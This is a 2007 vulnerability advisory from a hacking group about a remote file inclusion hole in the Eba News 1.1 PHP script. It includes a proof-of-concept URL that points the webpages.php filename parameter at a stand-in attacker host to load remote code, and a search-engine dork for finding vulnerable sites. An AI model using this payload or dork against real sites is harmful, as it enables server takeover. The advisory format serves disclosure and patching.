<<< Date Index >>>     <<< Thread Index >>>

Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org



--------------------------------------------------
Eba News Version : v1.1 <=  (webpages.php) Remote File Include 
--------------------------------------------------

Author          : SekoMirza
Date Found      : Nisan 11 2007
Location        : Fransa // ... 
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application     : Eba News
version         : 1.1
vendor          : http://ebascripts.com/
source url      : http://ebascripts.com/
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP 
which utilizes MySQL as the backend. It provides a friendly user interface with 
a great functionality. With automatic installation, you can have a professional 
looking and secure news management system ready to use in mere minutes.

 

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php


Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~
"Eba News"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

--------------------------------------------------
Shoutz:
~~
~ My  Sweet       -> Caramel 
~ For Mp3s        -> Hypn0sis
~ For Support     -> www.starhack.org
~ My  Bro         -> PhantomOrchid
~ My  Preceptor   -> Earnk Kazno
 

--------------------------------------------------

Contact:
~~~
 
     Seko[at]se-ko[dot]info
     
-------------------------------- [ EOF ]----------